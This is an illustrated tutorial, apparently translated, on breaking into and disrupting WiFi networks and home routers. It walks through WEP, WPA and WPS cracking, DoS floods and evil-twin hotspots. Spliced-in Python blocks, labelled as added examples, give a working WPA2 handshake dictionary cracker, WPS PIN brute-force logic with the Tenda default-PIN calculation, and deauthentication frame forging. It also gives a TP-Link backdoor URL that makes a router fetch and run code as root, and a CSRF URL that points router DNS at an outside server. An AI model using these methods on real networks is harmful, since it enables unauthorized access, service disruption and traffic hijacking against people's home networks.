A detailed and comprehensive analysis of wireless application security (illustrated tutorial)

Source: Internet
Author: User
Tags: http, authentication, csrf attack

WiFi cracking methods

WEP cracking

If your home router's wireless encryption is set to WEP, change it immediately. The WEP scheme is broken: because WEP reuses RC4 initialization vectors (IVs), anyone freeloading on the network can recover the key just by capturing enough encrypted data frames. No handshake is needed, only traffic, and the attack succeeds close to 100% of the time. The usual approach is to run a tool such as MIDIWEP to sniff the wireless signal; once it has collected enough IVs it recovers the key automatically, as shown in the figure below:

WPA/WPA2 brute force

The other encryption mode routers offer is WPA/WPA2. Unlike WEP, there is no publicly known method that recovers a WPA/WPA2 passphrase directly; the attacker can only capture the four-way handshake and then brute-force it offline. Because many users pick weak passphrases, combining a few tricks with a good dictionary still gives a fairly high success rate.

Running a dictionary against the handshake: success depends entirely on how good your dictionary is, and the time needed grows with the length and character set of the passphrase. The capture step is the same as for WEP: select the target access point and click Launch to start capturing. A client must be connected to the router while you capture, because the tool knocks that client offline and records the four-message WPA handshake when it reconnects automatically. If no client is online you cannot capture a handshake, and you have to wait until someone is using the network and try again.

When the prompt below appears, the capture succeeded. Copy the capture file out and verify it with EWSA: only a capture that contains all four handshake messages can be used for cracking.

Only a capture the tool reports as valid can be fed to a dictionary attack; the capture below, for example, is usable.

Next, load the capture into Hashcat or EWSA and run the dictionary directly. (My own machine is not very powerful, so I usually just hand the capture to someone on Taobao and pay them to run it.)
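To show what Hashcat or EWSA actually do with the capture, here is an added example, not code from the original article: the WPA2-PSK key derivation (PBKDF2 to the PMK, PRF-512 to the PTK, the KCK slice of the PTK, and the HMAC-SHA1 MIC over EAPOL message 2) implemented from the 802.11i definitions, with a dictionary loop on top. The handshake it cracks is constructed inline from made-up MAC addresses, nonces and SSID, so it runs offline; only the key-derivation relationships are real. Every candidate costs one PBKDF2 of 4096 rounds, which is why the dictionary's quality, not the tool, decides the outcome.

```python
import hashlib
import hmac

# Constructed sample handshake: made-up values standing in for a capture file.
SSID = "TestNet"
AP_MAC = bytes.fromhex("001122334455")
STA_MAC = bytes.fromhex("66778899aabb")
ANONCE = bytes(range(32))          # 0x00..0x1f
SNONCE = bytes(range(32, 64))      # 0x20..0x3f
RSN_IE = bytes.fromhex("30140100000fac040100000fac040100000fac020000")  # CCMP / PSK
MIC_OFFSET = 81                    # 4-byte EAPOL header + 77 bytes of key-frame fields
WORDLIST = ["password", "12345678", "qwertyuiop", "summer2012", "summer2013"]


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    """WPA2-PSK: PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf512(key: bytes, label: bytes, data: bytes) -> bytes:
    """802.11i PRF-512: HMAC-SHA1(key, label || 0x00 || data || i) for i = 0..3."""
    out = b"".join(
        hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
        for i in range(4)
    )
    return out[:64]


def derive_kck(pmk, ap_mac, sta_mac, anonce, snonce):
    """PTK = PRF-512(PMK, "Pairwise key expansion", min/max of the MACs and nonces).
    The first 16 bytes of the PTK are the KCK, the key that authenticates EAPOL."""
    data = (min(ap_mac, sta_mac) + max(ap_mac, sta_mac)
            + min(anonce, snonce) + max(anonce, snonce))
    return prf512(pmk, b"Pairwise key expansion", data)[:16]


def eapol_mic(kck: bytes, eapol_frame: bytes) -> bytes:
    """WPA2 key MIC: HMAC-SHA1 over the frame with its MIC field zeroed, truncated to 16 bytes."""
    zeroed = eapol_frame[:MIC_OFFSET] + b"\x00" * 16 + eapol_frame[MIC_OFFSET + 16:]
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:16]


def build_eapol_msg2(snonce: bytes, key_data: bytes, mic: bytes = b"\x00" * 16) -> bytes:
    """EAPOL-Key message 2 of 4 (client -> AP): the frame carrying the SNonce and the MIC."""
    body = (b"\x02"                       # descriptor type: RSN key
            + b"\x01\x0a"                 # key info: version 2 (HMAC-SHA1), pairwise, MIC set
            + b"\x00\x10"                 # key length
            + (1).to_bytes(8, "big")      # replay counter
            + snonce
            + b"\x00" * 16                # key IV
            + b"\x00" * 8                 # key RSC
            + b"\x00" * 8                 # key ID
            + mic
            + len(key_data).to_bytes(2, "big") + key_data)
    return b"\x01\x03" + len(body).to_bytes(2, "big") + body   # EAPOL v1, type Key


def make_sample_handshake(passphrase: str) -> dict:
    """Build the 'captured' message 2 the way a real client would, using the true PSK."""
    kck = derive_kck(pmk_from_passphrase(passphrase, SSID), AP_MAC, STA_MAC, ANONCE, SNONCE)
    mic = eapol_mic(kck, build_eapol_msg2(SNONCE, RSN_IE))
    return {"ssid": SSID, "ap_mac": AP_MAC, "sta_mac": STA_MAC, "anonce": ANONCE,
            "snonce": SNONCE, "eapol": build_eapol_msg2(SNONCE, RSN_IE, mic), "mic": mic}


def check_passphrase(hs: dict, candidate: str) -> bool:
    """Per-candidate work of a cracker: one PBKDF2 (4096 rounds), one PRF-512, one HMAC."""
    pmk = pmk_from_passphrase(candidate, hs["ssid"])
    kck = derive_kck(pmk, hs["ap_mac"], hs["sta_mac"], hs["anonce"], hs["snonce"])
    return hmac.compare_digest(eapol_mic(kck, hs["eapol"]), hs["mic"])


def crack_handshake(hs: dict, wordlist):
    """Dictionary attack: return the first word whose MIC matches the captured one, else None."""
    for word in wordlist:
        if check_passphrase(hs, word):
            return word
    return None


SAMPLE_HANDSHAKE = make_sample_handshake("summer2013")   # the PSK we pretend not to know
```

Only the SSID, the two MAC addresses, the two nonces and one MIC-bearing EAPOL frame are needed from the capture, which is exactly why EWSA insists on a complete handshake: without message 2 (or 4) there is no MIC to test candidates against.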

PIN brute force (WPS cracking)

Most wireless routers offer a WPS quick-connect function: enter the router's PIN correctly and the client negotiates the WPA key automatically. The PIN is 8 decimal digits. The first 4 digits and the last 4 are verified separately, and the 8th digit is a checksum computed from the first 7. So recovering the PIN takes at most 10^4 + 10^3 = 11,000 attempts rather than 10^8; Reaver is the tool that does this job. As long as the router has WPS enabled and has no mechanism to lock WPS after failed attempts, the correct PIN can be found, and with the PIN the router hands over the WPA passphrase. Most routers ship with WPS enabled. Note, however, that some routers lock WPS after a number of wrong PINs; in that case you are back to capturing the handshake and running a dictionary.

Click Scan to list routers with their MAC address, name and WPS support. Pick a router that has WPS and click Reaver to start the PIN attack, as in the figure below.

The PIN is cracked:

Connecting

Enter the cracked PIN in the box and click Next; the software finds the router and connects automatically.

Tenda wireless router PIN vulnerability

Tenda routers whose MAC address starts with C83A35 or 00B00C use a default PIN that can be calculated from the MAC.

Set the calculator to programmer mode and select hexadecimal. For a MAC such as 08:10:76:0f:b3:5c enter the last six hex digits (0fb35c), then switch to decimal: the result is the first 7 digits of the PIN, and the 8th digit is the checksum, which the software completes by itself.

That calculation gives the router's first 7 PIN digits. The PIN has 8 digits, so only the checksum digit is left; compute it (or just try the ten possibilities) and connect with the PIN.
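The two points above, the 11,000-attempt bound for WPS PIN brute force and the Tenda MAC-to-PIN derivation, both rest on the WPS checksum digit. The following added example (not code from the article, Reaver or Tenda) implements that checksum, validates PINs with it, counts how many guesses a split first-half/second-half brute force needs for a given PIN, and reproduces the MAC calculation for the 08:10:76:0f:b3:5c example from the text. One assumption not stated on the page: when the decimal value of the last six hex digits has fewer or more than 7 digits, the code zero-pads or reduces it modulo 10^7.

```python
def wps_checksum_digit(first7: int) -> int:
    """Checksum (8th) digit of a WPS PIN: weights 3,1,3,1,3,1,3 over the seven leading
    digits, then whatever digit brings the weighted sum to a multiple of 10."""
    if not 0 <= first7 < 10**7:
        raise ValueError("first7 must fit in 7 decimal digits")
    accum, n = 0, first7
    for weight in (3, 1, 3, 1, 3, 1, 3):     # walking up from the least significant digit
        accum += weight * (n % 10)
        n //= 10
    return (10 - accum % 10) % 10


def wps_pin_valid(pin: str) -> bool:
    """True if pin is 8 digits and its last digit is the correct checksum."""
    return len(pin) == 8 and pin.isdigit() and int(pin[7]) == wps_checksum_digit(int(pin[:7]))


def split_bruteforce_attempts(target_pin: str) -> int:
    """Number of guesses a Reaver-style attack needs to reach target_pin.
    The registrar confirms the first 4 digits on their own, so the attacker fixes them first
    (at most 10^4 tries). Of the remaining 4 digits only 3 are free because the 8th is the
    checksum (at most 10^3 tries), hence the 11,000 worst case."""
    if not wps_pin_valid(target_pin):
        raise ValueError("not a valid WPS PIN")
    attempts = 0
    first_half = None
    for guess in range(10_000):                     # phase 1: digits 1-4
        attempts += 1
        if f"{guess:04d}" == target_pin[:4]:
            first_half = guess
            break
    for guess in range(1_000):                      # phase 2: digits 5-7, checksum derived
        attempts += 1
        first7 = first_half * 1000 + guess
        if f"{first7:07d}{wps_checksum_digit(first7)}" == target_pin:
            return attempts
    raise RuntimeError("unreachable for a valid PIN")


def tenda_default_pin(mac: str) -> str:
    """Default PIN of the affected Tenda routers: the last 6 hex digits of the MAC read as a
    decimal number give the first 7 PIN digits; the 8th is the checksum.
    Assumption (not on the page): the value is zero-padded / reduced to exactly 7 digits."""
    hex_digits = mac.replace(":", "").replace("-", "").lower()
    if len(hex_digits) != 12:
        raise ValueError("MAC must have 12 hex digits")
    first7 = int(hex_digits[-6:], 16) % 10**7
    return f"{first7:07d}{wps_checksum_digit(first7)}"
```

The split matters more than the checksum: without the separate first-half acknowledgement the search space would be 10^7, which no router would survive trying at WPS speeds. That acknowledgement is the protocol flaw, and rate limiting or locking WPS after failed attempts is the only fix that does not require disabling WPS outright.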

Apps that leak WiFi passwords

The WiFi Master Key app can be used to obtain WiFi passwords, provided the Android phone is rooted. The app fetches passwords that other users have shared from its server, connects, and clears the password again after disconnecting. The key point is that while the connection is up, the password is stored locally in /data/misc/wifi/wpa_supplicant.conf. If we force-stop the WiFi Master Key process, the password stays on disk; open /data/misc/wifi/wpa_supplicant.conf with a file manager such as RE or ES File Explorer and the password is there in plaintext.

Alternatively, install an app: search for WiFi Connection Manager, long-press a network and choose to show the password. All of this requires root.

WiFi attacks

Man-in-the-middle attack

A man-in-the-middle attack places the attacker inside an otherwise normal connection between the target host and another host. By intercepting, inserting, forging or interrupting packets the attacker can obtain the victim's login account and password, impersonate either side, and so on.

ARP spoofing from a phone

After joining the network, the device list that dSploit scans is exactly the same as the one in the router's management interface:

Pivot (springboard) attacks

Software-based wireless pivoting

In software-based wireless pivoting, a host or laptop that is connected to both the wireless network and the wired network acts as the relay node, bridging the wireless signal into the wired network.

Hardware-based wireless pivoting

Here a host, wireless router or wireless AP acts as the relay node, connected to the target wireless network and retransmitting its signal; this is the familiar wireless relay (repeater) setup.

By chaining several wireless APs as relays, the original internal wireless signal is carried well beyond its intended coverage.

DHCP attacks

A DHCP starvation attack, which floods the server with lease requests from forged MAC addresses, quickly exhausts the IP address pool, so new clients cannot obtain an address and a large part of the network stops working. The attack is hard to trace back and extremely disruptive.

(Figure: a large number of IP addresses occupied by forged clients)

Wireless DoS attacks

Authentication flood

Like traditional wired networks, wireless routers face the threat of denial-of-service attacks.

We use MDK3 to test an authentication flood.

MDK3 forges a large number of fake clients that connect to ChinaNet; their MAC addresses are randomly generated as well.

Deauthentication flood

A client establishes a connection to the AP.

The attacker broadcasts forged deauthentication frames.

The client believes the frames come from the AP.

The connected clients disconnect by themselves.

This attack targets the clients, not the AP. As soon as we launch it we can see that we have lost network access; the effect is immediate. The -s parameter raises the packet rate. It is extremely effective: generally, as soon as it starts, clients drop off the network. The reason it works is that deauthentication is an unauthenticated management frame, so a client accepts any frame that carries its AP's BSSID; only networks where both AP and clients enforce 802.11w protected management frames are immune.
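To make the four steps above concrete, here is an added example (not code from the article or from MDK3) that forges the frame MDK3's deauthentication mode sends, decodes it back, and runs a simple flood detector over a constructed batch of frames. It builds raw 802.11 bytes only; it does not transmit anything, and the BSSID and client addresses are made up.

```python
import struct
from collections import Counter

BROADCAST = "ff:ff:ff:ff:ff:ff"
DEAUTH_FC = 0x00C0   # frame control: type 0 (management), subtype 12 (deauthentication)


def mac_to_bytes(mac: str) -> bytes:
    return bytes.fromhex(mac.replace(":", "").replace("-", ""))


def bytes_to_mac(b: bytes) -> str:
    return ":".join(f"{x:02x}" for x in b)


def build_deauth_frame(bssid: str, client: str = BROADCAST, reason: int = 7, seq: int = 0) -> bytes:
    """Forge one deauthentication frame. Nothing in it is keyed: a client accepts it as long
    as addr2/addr3 match its AP's BSSID, unless 802.11w protected management frames are on."""
    header = (struct.pack("<HH", DEAUTH_FC, 0x013A)   # frame control, duration
              + mac_to_bytes(client)                   # addr1: receiver; broadcast hits every client
              + mac_to_bytes(bssid)                    # addr2: transmitter, spoofed as the AP
              + mac_to_bytes(bssid)                    # addr3: BSSID
              + struct.pack("<H", (seq & 0x0FFF) << 4))  # sequence control (fragment 0)
    return header + struct.pack("<H", reason)          # reason 7: class 3 frame from nonassociated STA


def parse_deauth_frame(frame: bytes) -> dict:
    """Decode a deauthentication frame; raises ValueError for any other frame."""
    if len(frame) < 26:
        raise ValueError("frame too short")
    fc = struct.unpack_from("<H", frame, 0)[0]
    if fc & 0x00FC != DEAUTH_FC:                       # compare version/type/subtype bits only
        raise ValueError("not a deauthentication frame")
    return {
        "receiver": bytes_to_mac(frame[4:10]),
        "transmitter": bytes_to_mac(frame[10:16]),
        "bssid": bytes_to_mac(frame[16:22]),
        "seq": struct.unpack_from("<H", frame, 22)[0] >> 4,
        "reason": struct.unpack_from("<H", frame, 24)[0],
    }


def detect_deauth_flood(frames, threshold: int = 20) -> dict:
    """Count broadcast deauthentications per BSSID over a batch of raw frames and return
    {bssid: count} for every BSSID at or above threshold. A real AP almost never sends
    broadcast deauths in volume, so a burst like this is a reliable flood indicator."""
    counts = Counter()
    for f in frames:
        try:
            d = parse_deauth_frame(f)
        except ValueError:
            continue
        if d["receiver"] == BROADCAST:
            counts[d["bssid"]] += 1
    return {b: c for b, c in counts.items() if c >= threshold}


# Constructed sample batch: 50 forged broadcast deauths against one BSSID plus one ordinary
# unicast deauth from a different AP, which must not be flagged.
SAMPLE_FRAMES = [build_deauth_frame("00:11:22:33:44:55", seq=i) for i in range(50)]
SAMPLE_FRAMES.append(build_deauth_frame("66:77:88:99:aa:bb", client="0c:0d:0e:0f:10:11", reason=3))
```

A monitor-mode capture (tcpdump -i wlan0mon or a wireless IDS) fed into detect_deauth_flood is the defensive counterpart of the attack shown in the figures: the same frame layout that makes the attack trivial makes it trivially visible.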

WiFi phishing

Passive attack

Set up a fake WiFi hotspot, wait for victims to connect, and use tcpdump or similar tools to capture their traffic and steal data.

Active attack

Exploit flaws in the smartphone's WiFi probing behaviour and its automatic-reconnect design.

Once a phone has connected to a hotspot it keeps that hotspot's details and reconnects automatically whenever it enters the network's coverage area.

Open WiFi hotspots

China Mobile hotspots: CMCC, cmcc-edu, etc.

China Unicom hotspot: chinaunicom

China Telecom hotspots: ChinaNet, chinatelecom, etc.

To speed up reconnection, the device broadcasts probe requests naming the networks it has saved, SSIDs included. Anyone who captures these broadcasts learns which networks the device trusts and therefore knows exactly which one to fake.

Set up an open AP with the same SSID. The phone connects to it as if it were the hotspot it joined before: the match is on the SSID alone, and since the network has no password there is no key to verify, so it joins on its own. (This was reproduced on Android 4.2.) Note that this works for saved open networks such as the carrier hotspots above; a saved WPA network is normally not matched by an open clone, because the security type is part of the saved profile.
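The probing behaviour described above is easy to observe in a monitor-mode capture. The following added example (not code from the article) builds a few probe request frames with constructed client MAC addresses and SSIDs, then parses a batch of raw 802.11 frames to recover which SSIDs each client is asking for and which of them are the open carrier hotspots listed on this page, i.e. the ones an attacker would clone. Frames are built in memory only; nothing is transmitted.

```python
import struct

PROBE_REQ_FC = 0x0040   # frame control: type 0 (management), subtype 4 (probe request)
BROADCAST = "ff:ff:ff:ff:ff:ff"
# Open carrier SSIDs named on this page (SSIDs are case-sensitive, so keep the spelling)
OPEN_CARRIER_SSIDS = {"CMCC", "cmcc-edu", "chinaunicom", "ChinaNet", "chinatelecom"}


def mac_to_bytes(mac: str) -> bytes:
    return bytes.fromhex(mac.replace(":", "").replace("-", ""))


def bytes_to_mac(b: bytes) -> str:
    return ":".join(f"{x:02x}" for x in b)


def build_probe_request(sta_mac: str, ssid: str, seq: int = 0) -> bytes:
    """Directed probe request from sta_mac for ssid; an empty ssid is a wildcard probe."""
    header = (struct.pack("<HH", PROBE_REQ_FC, 0)
              + mac_to_bytes(BROADCAST)          # addr1: destination
              + mac_to_bytes(sta_mac)            # addr2: source (the client)
              + mac_to_bytes(BROADCAST)          # addr3: BSSID, wildcard
              + struct.pack("<H", (seq & 0x0FFF) << 4))
    ssid_bytes = ssid.encode()
    tags = bytes([0, len(ssid_bytes)]) + ssid_bytes     # tag 0: SSID, sent in the clear
    tags += bytes.fromhex("010402040b16")               # tag 1: supported rates 1/2/5.5/11 Mbit
    return header + tags


def parse_tags(body: bytes) -> dict:
    """Split the tagged-parameter area into {tag_id: value}, keeping the first of each id."""
    tags, i = {}, 0
    while i + 2 <= len(body):
        tag_id, length = body[i], body[i + 1]
        tags.setdefault(tag_id, body[i + 2:i + 2 + length])
        i += 2 + length
    return tags


def probed_ssids(frames) -> dict:
    """Map each client MAC to the set of SSIDs it probed for; non-probe frames and
    wildcard (empty-SSID) probes are ignored."""
    result = {}
    for f in frames:
        if len(f) < 24:
            continue
        fc = struct.unpack_from("<H", f, 0)[0]
        if fc & 0x00FC != PROBE_REQ_FC:
            continue
        sta = bytes_to_mac(f[10:16])
        ssid = parse_tags(f[24:]).get(0, b"")
        if ssid:
            result.setdefault(sta, set()).add(ssid.decode("utf-8", "replace"))
    return result


def evil_twin_targets(frames) -> dict:
    """For each client, the open carrier SSIDs it asked for: clone one of these and the
    client auto-joins, because no key is involved."""
    return {sta: sorted(s & OPEN_CARRIER_SSIDS)
            for sta, s in probed_ssids(frames).items() if s & OPEN_CARRIER_SSIDS}


# Constructed sample capture: two clients, one of which also sends a wildcard probe
SAMPLE_FRAMES = [
    build_probe_request("aa:bb:cc:00:00:01", "CMCC", seq=1),
    build_probe_request("aa:bb:cc:00:00:01", "HomeWiFi", seq=2),
    build_probe_request("aa:bb:cc:00:00:01", "", seq=3),
    build_probe_request("aa:bb:cc:00:00:02", "ChinaNet", seq=7),
]
```

Modern phones mitigate exactly this leak by sending wildcard probes and randomising the source MAC while unassociated, which is why the output of probed_ssids on a recent capture is much sparser than it was on Android 4.2.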

Built-in carrier WLAN profiles on domestic phones (deletable or not)

Carrier WiFi hotspot profiles are built into domestic phones, and on some handsets they cannot be deleted: the phone connects whenever it sees one of them. In that situation, anyone who sets up a hotspot named CMCC or similar can steal information from the phone.

Device attack and defence

TP-Link backdoor

Some TP-Link routers have a backdoor: requesting a specific page that needs no authentication makes the router download a program over TFTP from an attacker-controlled server and execute it. An attacker can use this to run arbitrary commands as root on the router and take complete control of it.

Requesting http://192.168.0.1/userRpmNatDebugRpm26525557/start_art.html makes the router fetch a file named nart.out via TFTP from the requesting machine and execute it with root privileges.

CSRF attack

Internet Explorer does not accept HTTP credentials embedded in the URL (user:password@host), so this attack does not work in IE; it works in Firefox and Chrome. (Newer Chrome and Firefox releases have since restricted URL-embedded credentials, so the original result may not reproduce on current browsers.)

http://admin:admin@192.168.1.1/userrpm/landhcpserverrpm.htm?dhcpserver=1&ip1=192.168.1.100&ip2=192.168.1.199&lease=120&gateway=0.0.0.0&domain=&dnsserver=&dnsserver=54.248.102.5&dnsserver2=8.8.8.8&save=%25b1%25a3+%25b4%25e6

When a victim who uses the default admin:admin credentials loads this URL (for example through an image tag on an attacker's page), the router's DHCP server is reconfigured with 54.248.102.5 as the primary DNS server and 8.8.8.8 as the secondary, so every client on the LAN silently starts using an attacker-controlled resolver.

A Beacon Communication router also has a published vulnerability that allows its DNS settings to be modified remotely:

Http://www.exploit-db.com/exploits/28450/

What can a compromised router do?

The network's egress traffic is in your hands: push a trojan to phones through a fake system update, plant drive-by exploits for IE and other browser vulnerabilities on PCs, steal login passwords, and so on.

Controlling the router means controlling over 80% of the traffic, with the same sniffing and hijacking possibilities as on the LAN.
